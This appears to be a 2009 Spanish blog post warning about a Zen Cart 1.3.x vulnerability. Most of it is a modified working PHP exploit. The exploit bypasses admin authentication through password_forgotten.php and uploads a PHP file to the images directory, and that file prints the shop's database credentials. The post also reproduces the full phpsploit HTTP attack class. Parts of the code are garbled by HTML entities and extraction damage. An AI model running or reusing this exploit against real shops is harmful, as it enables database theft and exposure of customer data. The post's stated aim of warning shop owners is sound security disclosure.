Zen Cart 1.3.x – Grave vulnerabilidad

Sergio Guerrero — Sat, 08 Aug 2009 21:37:52 +0000
En milw0rm.com se publican dos scripts (inyección de código, inyección de SQL) para explotar una grave vulnerabilidad que afecta a toda la rama 1.3.x de Zen Cart y que permite inyectar código de forma remota en el directorio de imágenes. Una vez nos inyectan el código en nuestra web, pueden incluso obtener los datos de acceso a la base de datos y borrarla o consultar los datos de nuestros clientes.
En vez de utilizar el exploit original, mostraré una modificación para mostrar los desastrosos efectos que puede tener esta vulnerabilidad de Zen Cart.
En el siguiente ejemplo muestro como nos podrían inyectar código de forma remota permitiéndoles obtener los datos de acceso a la base de datos. Antes de ejecutarlo, es necesario indicar correctamente la URL modificando la variable $url y si la tienda es vulnerable les aparecerá un enlace hacia el documento PHP que muestra los datos de acceso a la base de datos.
                          |  
  ========================================================================
  |                                                                      |
  | \$system> php $argv[0] <url>                                         |
  | Notes: <url>      ex: http://victim.com/site (no slash)              |
  |                                                                      |
  ========================================================================
  ";exit(1);
}*/
 
$url = 'http://www.web_con_bug.com';
$trick = "/password_forgotten.php";
 
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
 
$real_kthxbye = remote_exec($url);
 
// Remote Code Execution Exploit
function remote_exec($url) 
{
  global $xpl, $url, $trick;
 
  echo "\n[-] Ejecuci&oacute; remota de c&oacute;digo";
 
  if(!$xpl->get($url.'/admin/'))
  { 
    die("\n[!] error - El directorio /admin/ es un directorio protegido o no existe.\n");
  }
 
  $n = substr(md5(rand(0, 1337)), 0, 5).".php"; // random php file
  $code = 'DB_SERVER: " . DB_SERVER;
 
  echo "DB_SERVER_USERNAME: " . DB_SERVER_USERNAME;
  echo "DB_SERVER_PASSWORD: " . DB_SERVER_PASSWORD;
  echo "DB_DATABASE: " . DB_DATABASE;?>&#39;;
	
  $form = array(frmdt_url => $url."/admin/record_company.php".$trick."?action=insert",
                "record_company_name" => "0",
                "record_company_image" => array(frmdt_type => "tgreal/suce", // it works ! o_O
                                                             frmdt_filename => $n,
                                                             frmdt_content => $code));
 
  if($xpl->formdata($form))
  {
    echo "\n[!] Código inyectado en "{$url}/images/{$n}\"">{$url}/images/{$n}a>";
  }
  else
  {
    die("\n[!] error - No ha sido posible subir el script\n");
  }
}
 
/**
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.0
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */
 
class phpsploit
{
  var $proxyhost;
  var $proxyport;
  var $host;
  var $path;
  var $port;
  var $method;
  var $url;
  var $packet;
  var $proxyuser;
  var $proxypass;
  var $header;
  var $cookie;
  var $data;
  var $boundary;
  var $allowredirection;
  var $last_redirection;
  var $cookiejar;
  var $recv;
  var $cookie_str;
  var $header_str;
  var $server_content;
  var $server_header;
 
 
  /**
   * This function is called by the
   * get()/post()/formdata() functions.
   * You don't have to call it, this is
   * the main function.
   *
   * @access private
   * @return string $this->recv ServerResponse
   * 
   */
  function sock()
  {
    if(!empty($this->proxyhost) && !empty($this->proxyport))
      $socket = @fsockopen($this->proxyhost,$this->proxyport);
    else
      $socket = @fsockopen($this->host,$this->port);
 
    if(!$socket)
      die("Error: Host seems down");
 
    if($this->method=='get')
      $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
    elseif($this->method=='post' or $this->method=='formdata')
      $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
    else
      die("Error: Invalid method");
 
    if(!empty($this->proxyuser))
      $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
 
    if(!empty($this->header))
      $this->packet .= $this->showheader();
 
    if(!empty($this->cookie))
      $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
 
    $this->packet .= 'Host: '.$this->host."\r\n";
    $this->packet .= "Connection: Close\r\n";
 
    if($this->method=='post')
    {
      $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
      $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
      $this->packet .= $this->data."\r\n";
    }
    elseif($this->method=='formdata')
    {
      $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
      $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
      $this->packet .= $this->data;
    }
 
    $this->packet .= "\r\n";
    $this->recv = '';
 
    fputs($socket,$this->packet);
 
    while(!feof($socket))
      $this->recv .= fgets($socket);
 
    fclose($socket);
 
    if($this->cookiejar)
      $this->getcookie();
 
    if($this->allowredirection)
      return $this->getredirection();
    else
      return $this->recv;
  }
 
 
  /**
   * This function allows you to add several
   * cookies in the request.
   * 
   * @access  public
   * @param   string cookn CookieName
   * @param   string cookv CookieValue
   * @example $this->addcookie('name','value')
   * 
   */
  function addcookie($cookn,$cookv)
  {
    if(!isset($this->cookie))
      $this->cookie = array();
 
    $this->cookie[$cookn] = $cookv;
  }
 
 
  /**
   * This function allows you to add several
   * headers in the request.
   *
   * @access  public
   * @param   string headern HeaderName
   * @param   string headervalue Headervalue
   * @example $this->addheader('Client-IP', '128.5.2.3')
   * 
   */
  function addheader($headern,$headervalue)
  {
    if(!isset($this->header))
      $this->header = array();
 
    $this->header[$headern] = $headervalue;
  }
 
  /**
   * This function allows you to use an
   * http proxy server. Several methods
   * are supported.
   * 
   * @access  public
   * @param   string proxy ProxyHost
   * @param   integer proxyp ProxyPort
   * @example $this->proxy('localhost',8118)
   * @example $this->proxy('localhost:8118')
   * 
   */
  function proxy($proxy,$proxyp='')
  {
    if(empty($proxyp))
    {
      $proxarr = explode(':',$proxy);
      $this->proxyhost = $proxarr[0];
      $this->proxyport = (int)$proxarr[1];
    }
    else 
    {
      $this->proxyhost = $proxy;
      $this->proxyport = (int)$proxyp;
    }
 
    if($this->proxyport > 65535)
      die("Error: Invalid port number");
  }
 
  /**
   * This function allows you to use an
   * http proxy server which requires a
   * basic authentification. Several
   * methods are supported:
   *
   * @access  public
   * @param   string proxyauth ProxyUser
   * @param   string proxypass ProxyPass
   * @example $this->proxyauth('user','pwd')
   * @example $this->proxyauth('user:pwd');
   * 
   */
  function proxyauth($proxyauth,$proxypass='')
  {
    if(empty($proxypass))
    {
      $posvirg = strpos($proxyauth,':');
      $this->proxyuser = substr($proxyauth,0,$posvirg);
      $this->proxypass = substr($proxyauth,$posvirg+1);
    }
    else
    {
      $this->proxyuser = $proxyauth;
      $this->proxypass = $proxypass;
    }
  }
 
  /**
   * This function allows you to set
   * the 'User-Agent' header.
   * 
   * @access  public
   * @param   string useragent Agent
   * @example $this->agent('Firefox')
   * 
   */
  function agent($useragent)
  {
    $this->addheader('User-Agent',$useragent);
  }
 
  /**
   * This function returns the headers
   * which will be in the next request.
   * 
   * @access  public
   * @return  string $this->header_str Headers
   * @example $this->showheader()
   * 
   */
  function showheader()
  {
    $this->header_str = '';
 
    if(!isset($this->header))
      return;
 
    foreach($this->header as $name => $value)
      $this->header_str .= $name.': '.$value."\r\n";
 
    return $this->header_str;
  }
 
  /**
   * This function returns the cookies
   * which will be in the next request.
   * 
   * @access  public
   * @return  string $this->cookie_str Cookies
   * @example $this->showcookie()
   * 
   */
  function showcookie()
  {
    $this->cookie_str = '';
 
    if(!isset($this->cookie))
      return;
 
    foreach($this->cookie as $name => $value)
      $this->cookie_str .= $name.'='.$value.'; ';
 
    return $this->cookie_str;
  }
 
  /**
   * This function returns the last
   * formed http request.
   * 
   * @access  public
   * @return  string $this->packet HttpPacket
   * @example $this->showlastrequest()
   * 
   */
  function showlastrequest()
  {
    if(!isset($this->packet))
      return;
    else
      return $this->packet;
  }
 
  /**
   * This function sends the formed
   * http packet with the GET method.
   * 
   * @access  public
   * @param   string url Url
   * @return  string $this->sock()
   * @example $this->get('localhost/index.php?var=x')
   * @example $this->get('http://localhost:88/tst.php')
   * 
   */
  function get($url)
  {
    $this->target($url);
    $this->method = 'get';
    return $this->sock();
  }
 
  /**
   * This function sends the formed
   * http packet with the POST method.
   *
   * @access  public
   * @param   string url  Url
   * @param   string data PostData
   * @return  string $this->sock()
   * @example $this->post('http://localhost/','helo=x')
   * 
   */	
  function post($url,$data)
  {
    $this->target($url);
    $this->method = 'post';
    $this->data = $data;
    return $this->sock();
  }
 
  /**
   * This function sends the formed http
   * packet with the POST method using
   * the multipart/form-data enctype.
   * 
   * @access  public
   * @param   array array FormDataArray
   * @return  string $this->sock()
   * @example $formdata = array(
   *                      frmdt_url => 'http://localhost/upload.php',
   *                      frmdt_boundary => '123456', # Optional
   *                      'var' => 'example',
   *                      'file' => array(
   *                                frmdt_type => 'image/gif',  # Optional
   *                                frmdt_transfert => 'binary' # Optional
   *                                frmdt_filename => 'hello.php,
   *                                frmdt_content => ''));
   *          $this->formdata($formdata);
   * 
   */
  function formdata($array)
  {
    $this->target($array[frmdt_url]);
    $this->method = 'formdata';
    $this->data = '';
 
    if(!isset($array[frmdt_boundary]))
      $this->boundary = 'phpsploit';
    else
      $this->boundary = $array[frmdt_boundary];
 
    foreach($array as $key => $value)
    {
      if(!preg_match('#^frmdt_(boundary|url)#',$key))
      {
        $this->data .= str_repeat('-',29).$this->boundary."\r\n";
        $this->data .= 'Content-Disposition: form-data; name="&#39;.$key.'";';
				
        if(!is_array($value))
        {
          $this->data .= "\r\n\r\n".$value."\r\n";
        }
        else
        {
          $this->data .= &#39; filename="'.$array[$key][frmdt_filename]."\";\r\n";

          if(isset($array[$key][frmdt_type]))
            $this->data .= &#39;Content-Type: '.$array[$key][frmdt_type]."\r\n";

          if(isset($array[$key][frmdt_transfert]))
            $this->data .= &#39;Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

          $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
        }
      }
    }
 
    $this->data .= str_repeat(&#39;-',29).$this->boundary."--\r\n";
    return $this->sock();
  }
 
  /**
   * This function returns the content
   * of the server response, without
   * the headers.
   * 
   * @access  public
   * @param   string code ServerResponse
   * @return  string $this->server_content
   * @example $this->getcontent()
   * @example $this->getcontent($this->get('http://localhost/'))
   * 
   */
  function getcontent($code=&#39;')
  {
    if(empty($code))
      $code = $this->recv;
 
    $code = explode("\r\n\r\n",$code);
    $this->server_content = &#39;';
		
    for($i=1;$i<count($code);$i++) this-="">server_content .= $code[$i];
 
    return $this->server_content;
  }
 
  /**
   * This function returns the headers
   * of the server response, without
   * the content.
   * 
   * @access  public
   * @param   string code ServerResponse
   * @return  string $this->server_header
   * @example $this->getcontent()
   * @example $this->getcontent($this->post('http://localhost/','1=2'))
   * 
   */
  function getheader($code=&#39;')
  {
    if(empty($code))
      $code = $this->recv;
 
    $code = explode("\r\n\r\n",$code);
    $this->server_header = $code[0];
 
    return $this->server_header;
  }
 
  /**
   * This function is called by the
   * cookiejar() function. It adds the
   * value of the "Set-Cookie" header
   * in the "Cookie" header for the
   * next request. You don't have to
   * call it.
   * 
   * @access private
   * @param  string code ServerResponse
   * 
   */
  function getcookie()
  {
    foreach(explode("\r\n",$this->getheader()) as $header)
    {
      if(preg_match(&#39;/set-cookie/i',$header))
      {
        $fequal = strpos($header,&#39;=');
        $fvirgu = strpos($header,&#39;;');
				
        // 12=strlen('set-cookie: ')
        $cname  = substr($header,12,$fequal-12);
        $cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
 
        $this->cookie[trim($cname)] = trim($cvalu);
      }
    }
  }
 
  /**
   * This function is called by the
   * get()/post() functions. You
   * don't have to call it.
   *
   * @access  private
   * @param   string urltarg Url
   * @example $this->target('http://localhost/')
   * 
   */
  function target($urltarg)
  {
    if(!ereg(&#39;^http://',$urltarg))
      $urltarg = &#39;http://'.$urltarg;
   
    $urlarr     = parse_url($urltarg);
    $this->url  = &#39;http://'.$urlarr['host'].$urlarr['path'];
		
    if(isset($urlarr[&#39;query']))
      $this->url .= &#39;?'.$urlarr['query'];

    $this->port = !empty($urlarr[&#39;port']) ? $urlarr['port'] : 80;
    $this->host = $urlarr[&#39;host'];

    if($this->port != &#39;80')
      $this->host .= &#39;:'.$this->port;

    if(!isset($urlarr[&#39;path']) or empty($urlarr['path']))
      die("Error: No path precised");
 
    $this->path = substr($urlarr[&#39;path'],0,strrpos($urlarr['path'],'/')+1);

    if($this->port > 65535)
      die("Error: Invalid port number");
  }
 
  /**
   * If you call this function,
   * the script will extract all
   * 'Set-Cookie' headers values
   * and it will automatically add
   * them into the 'Cookie' header
   * for all next requests.
   *
   * @access  public
   * @param   integer code 1(enabled) 0(disabled)
   * @example $this->cookiejar(0)
   * @example $this->cookiejar(1)
   * 
   */
  function cookiejar($code)
  {
    if($code==&#39;0')
      $this->cookiejar=FALSE;
    elseif($code==&#39;1')
      $this->cookiejar=TRUE;
   }
 
  /**
   * If you call this function,
   * the script will follow all
   * redirections sent by the server.
   * 
   * @access  public
   * @param   integer code 1(enabled) 0(disabled)
   * @example $this->allowredirection(0)
   * @example $this->allowredirection(1)
   * 
   */
  function allowredirection($code)
  {
    if($code==&#39;0')
      $this->allowredirection=FALSE;
    elseif($code==&#39;1')
      $this->allowredirection=TRUE;
  }
 
  /**
   * This function is called if
   * allowredirection() is enabled.
   * You don't have to call it.
   *
   * @access private
   * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
   * @return string $this->get($this->last_redirection)
   * @return string $this->recv;
   * 
   */
  function getredirection()
  {
    if(preg_match(&#39;/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
    {
      $this->last_redirection = trim($codearr[2]);
 
      if(!ereg(&#39;://',$this->last_redirection))
        return $this->get(&#39;http://'.$this->host.$this->path.$this->last_redirection);
      else
        return $this->get($this->last_redirection);
    }
    else
      return $this->recv;
  }
 
  /**
   * This function allows you
   * to reset some parameters.
   * 
   * @access  public
   * @param   string func Param
   * @example $this->reset('header')
   * @example $this->reset('cookie')
   * @example $this->reset()
   * 
   */
  function reset($func=&#39;')
  {
    switch($func)
    {
      case &#39;header':
        $this->header = array(&#39;');
        break;
 
      case &#39;cookie':
        $this->cookie = array(&#39;');
        break;
 
      default:
        $this->cookiejar = &#39;';
        $this->header = array(&#39;');
        $this->cookie = array(&#39;');
        $this->allowredirection = &#39;';
        break;
    }
  }
}
count($code);$i++)>url>url>
Este script no funciona en caso de no encontrar el directorio admin y es por eso que podemos aplicar la solución que se comenta en el foro de Zen Cart.
Comparte esta entrada:
Experto Zen Cart - Programador Freelance Tiendas Virtuales Zen Cart » Seguridad Zen Cart

Zen Cart 1.3.x – Grave vulnerabilidad
